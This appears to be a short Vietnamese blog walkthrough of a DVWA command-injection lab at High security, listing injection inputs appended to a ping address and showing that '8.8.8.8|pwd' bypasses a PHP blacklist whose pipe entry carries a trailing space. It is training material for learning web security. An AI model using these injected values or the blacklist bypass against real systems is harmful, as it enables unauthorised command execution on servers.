1. Thiết lập mức độ High (các bước giống như thiết lập mức độ low và medium ở bài trước)
2. Chúng ta thử kết hợp tất cả các ký tự đã liệt kê trong level LOW đều không được. Tôi phải thú nhận rằng: ở mức này thực sự làm tôi bân tâm
"8.8.8.8 & pwd" ==> fail
"8.8.8.8 && pwd" ==> fail
"8.8.8.8 ; pwd" ==> fail
"8.8.8.8 | pwd" ==> fail
"8.8.8.8 || pwd" ==> fail
Nhưng khi tôi thử nối các lệnh lại mà không có khoảng trống thì có 1 lệnh đã thành công.
"8.8.8.8|pwd" ==> OK
==> chuyện gì đã xảy ra ??? chúng ta thử view source code PHP xem sao.
- Trong Blacklist, bạn nhận thấy ở ký tự '| ' có 1 khoảng trống và đó là lý do khi đánh liền câu lệnh sẽ chạy.
No comments:
Post a Comment